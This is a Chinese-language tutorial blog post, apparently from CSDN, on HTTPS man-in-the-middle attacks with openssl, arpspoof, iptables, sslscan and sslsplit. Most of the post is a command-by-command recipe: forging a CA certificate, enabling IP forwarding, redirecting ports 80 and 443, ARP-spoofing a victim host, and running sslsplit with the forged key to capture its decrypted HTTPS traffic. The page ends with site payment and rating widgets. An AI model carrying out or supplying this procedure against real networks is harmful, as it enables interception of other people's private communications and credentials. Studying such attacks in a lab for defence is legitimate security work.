https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit )

**

openssl

**
识别ssl的签发单位、证书信息等
可以伪造证书

  • openssl 直接调用openssl库识别目标服务器支持的SSL/TLS(传输层安全)
    -openssl s_client www.taobao.com:443
    在这里插入图片描述
    上图的GlobalSign Organization Validation CA是SSL协议证书的颁发公司
  • openssl s_client -connect 查看证书信息
    openssl s_client -connect www.taobao.com:443
  • openssl s_client -tlsl_2 -cipher “NULL,EXPORT,LOW,DES” 协商低安全级别cipher suite服务器不响应 必须有四到五种加密组合才能构成SSL
    openssl s_client -tlsl_2 -cipher "NULL,EXPORT,LOW,DES" www.baidu.com:443
    在这里插入图片描述
  • openssl ciphers -v "NULL,EXPORT,LOW,DES" 列出已知不安全ciper(加密组合套件)组合
    在这里插入图片描述

openssl伪造证书


第一步先生成私钥(注意生成的位置)
openssl genrsa -out ca.key 2048

2048是长度 大多数证书长度都是2048

第二部生成证书(注意生成的位置)
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

new是新生成的 509是标准 days是有效时间 key是用那个私钥生成 crt是证书格式

最后下面按照提示填写国家CN 省Shangxi 城市Taiyuan 组织名称 组织单位名字 常用的FQDN名称 邮箱地址

**

sslscan、sysctl、arpspoof 中间人攻击、arp欺骗工具

**

  1. 先解释一下什么是arp欺骗,也就是中间人攻击
  • 首先以太网当中,网络设备之间互相通信用的是mac而不是IP地址 ARP协议就是将IP地址转换成MAC地址的,RARP正好相反。
  • 假设A(192.168.1.2)与B(192.168.1.3)在同一局域网,A要和B实现通信。A首先会发送一个数据包广播到局域网广播地址192.168.1.255(假设),该数据包内包含了源IP(A)、源MAC、目的IP(B)、目的MAC,这个数据包会被发放给局域网中所有的主机,但只有B主机会回复一个包含了源IP(B)、源MAC、目的IP(A)、目的MAC的数据包给A,同时A主机会将返回的这个地址保存在ARP缓存表中。
  • 在ARP缓存表机制存在一个缺陷,就是当请求主机收到ARP应答包后,不会去验证自己是否向对方主机发送过ARP请求包,就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中,如果原有相同IP对应关系,则原有的会被替换。
  • 双向欺骗,就是双方都骗一次,单向就是只骗一个
  • arp -a可以查看arp缓存表

arp欺骗过程

伪造服务器首先要伪造证书

  1. 启动功能sysctl -w net.ipv4.ip_forward=1
  2. 清空iptables表内信息iptables -t nat -F
  3. 列出iptables表内信息,查看是否为空iptables -t nat -L,不为空则进行第二部清空
  4. 确认端口80和443是否被占用netstat -pantu | grep :80 netstat -pantu | grep :443 如果没有回显则表示没有被占用
  5. 开始写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

-t 使用哪张表
PREROUTING 在路由之前就生效
-p tcp 使用tcp协议
80 REDIRECT 8080将80端口的流量重定向给8080

  1. 写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
  2. 查看iptables表iptables -t nat -L信息
  3. arp欺骗开始arpspoof -i eth0 -t 192.168.72.8 -r 192.168.72.2 -i是网卡,-t是被欺骗的IP,-r是服务器的地址
  4. 查被欺骗主机的arp表,发现mac地址已经改变
  5. 记录被欺骗主机请求信息sslsplit -D -l 1.log -j /root/Desktop/test/ -S /root/Desktop/test/aaa -k /root/Desktop/ca.key -c /root/Desktop/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

-D 查看debug信息
-l 连接请求过程记录到某个文件
-S请求详细过程记录到某个文件
-k 密钥
-c 证书
ssl 指向8443
tcp指向8080
0.0.0.0谁都可以访问

  1. 现在打开被劫持主机,浏览百度,发现显示不是安全的连接,文件内存在了信息,证明劫持成功
  2. 如果在这个时候,将最早生成的证书导入到被挟持主机上,则不会报错
  3. 报错的原因、、、、

**

sslscan

**

  • 自动识别SSL配置错误、过期协议、过时cipher suite(加密组合套件)和hash算法
  • 默认会检查CRIME、heartblleed漏洞(后者心脏出血漏洞 错误原因:缓冲区过读,即可以读取的数据比英国允许读取的还多)
  • 绿色表示安全,红色黄色需要引起注意

sslscan url 跟下面加参数是一样的结果

-tlsall
sslscan -tlsall www.taobao.com:443
检测TSL有没有漏洞
支持的cipher suite(加密组合套件)算法
DNS解析记录

  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值